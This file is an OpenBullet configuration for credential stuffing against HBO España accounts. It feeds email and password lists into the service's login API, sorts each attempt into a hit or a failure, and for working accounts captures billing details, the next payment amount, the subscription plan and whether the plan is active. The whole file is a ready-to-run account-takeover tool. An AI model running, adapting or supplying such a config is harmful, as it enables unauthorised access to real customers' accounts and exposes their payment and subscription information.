[SETTINGS]
{
  "Name": "_+hboEspana+_",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2019-08-17T00:44:53.2605551+02:00",
  "AdditionalInfo": "",
  "Author": "AncientBanana♥",
  "Version": "1.3.6 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#deviceID FUNCTION RandomString "<device><type>web</type><deviceId>4aa4114c-271f-0e05-7f96-be5fab4b348a</deviceId></device>" -> VAR "dev_id" 

#encodePass FUNCTION Base64Encode "<PASS>" -> VAR "enpass" 

#encodeToken FUNCTION Base64Encode "<USER>:<enpass>" -> VAR "token" 

#postLogin REQUEST POST "https://api-hboe.hbo.clearleap.com/cloffice/client/device/login?language=en_hboespana" 
  CONTENT "<dev_id>" 
  CONTENTTYPE "text/plain" 
  HEADER "Authorization: Basic <token>" 
  HEADER "Content-Type: application/xml" 
  HEADER "Origin: https://en.hboespana.com" 
  HEADER "Referer: https://en.hboespana.com/sign-in" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 

#checkCredentials KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "token" 
  KEYCHAIN Failure OR 
    KEY "Problem with username or password" 
    KEY "authenticate" 

PARSE "<SOURCE>" LR "<token>" "</token>" -> VAR "token" 

#Get_Billing REQUEST GET "https://api-hboe.hbo.clearleap.com/cloffice/client/account/billingPreview?language=en_hboespana" 
  
  HEADER "Host: api-hboe.hbo.clearleap.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://en.hboespana.com/my-account/subscription" 
  HEADER "X-Client-Name: web" 
  HEADER "X-Client-Version: 3.10.5" 
  HEADER "X-Clearleap-DeviceId: 4aa4114c-271f-0e05-7f96-be5fab4b348a" 
  HEADER "X-Clearleap-DeviceToken: <token>" 
  HEADER "Origin: https://en.hboespana.com" 
  HEADER "DNT: 1" 
  HEADER "Connection: keep-alive" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<SOURCE>" DoesNotContain "<nextPaymentAmount>" 

PARSE "<SOURCE>" LR "<nextPaymentAmount>" "</nextPaymentAmount>" -> CAP "Next Payment" 

PARSE "<SOURCE>" LR "<nextInvoiceDate>" "</nextInvoiceDate>" -> CAP "Next Invoice" 

#Get_Subscription REQUEST GET "https://api-hboe.hbo.clearleap.com/cloffice/client/account/subscriptions?language=en_hboespana" 
  
  HEADER "Host: api-hboe.hbo.clearleap.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://en.hboespana.com/my-account/subscription" 
  HEADER "X-Client-Name: web" 
  HEADER "X-Client-Version: 3.10.5" 
  HEADER "X-Clearleap-DeviceId: 4aa4114c-271f-0e05-7f96-be5fab4b348a" 
  HEADER "X-Clearleap-DeviceToken: <token>" 
  HEADER "Origin: https://en.hboespana.com" 
  HEADER "DNT: 1" 
  HEADER "Connection: keep-alive" 

PARSE "<SOURCE>" LR "<state>" "</state>" -> VAR "Plan Active ?" 

FUNCTION Translate 
  KEY "Active" VALUE "Yes" 
  KEY "Expired" VALUE "No" 
  "<Plan Active ?>" -> CAP "Plan Active ?" 

PARSE "<SOURCE>" LR "<planName>" "</planName>" -> CAP "Subscription" 

PARSE "<SOURCE>" LR "<subscriptionStartDate>" "</subscriptionStartDate>" -> VAR "Subscription start" 

FUNCTION UnixTimeToDate "<Subscription start>" -> CAP "Subscription start" 

